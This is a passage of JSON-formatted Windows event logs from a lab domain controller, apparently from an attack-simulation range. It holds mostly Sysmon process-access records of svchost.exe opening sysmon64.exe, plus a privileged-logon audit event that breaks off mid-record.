{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5752,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5753,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5754,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5755,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5756,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5757,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5758,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5759,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:56.688\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0338-5F25-0000-0010C8CE0A00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:56.688","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0338-5F25-0000-0010C8CE0A00}","TargetProcessId":"3304","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220676,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xAD140\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special 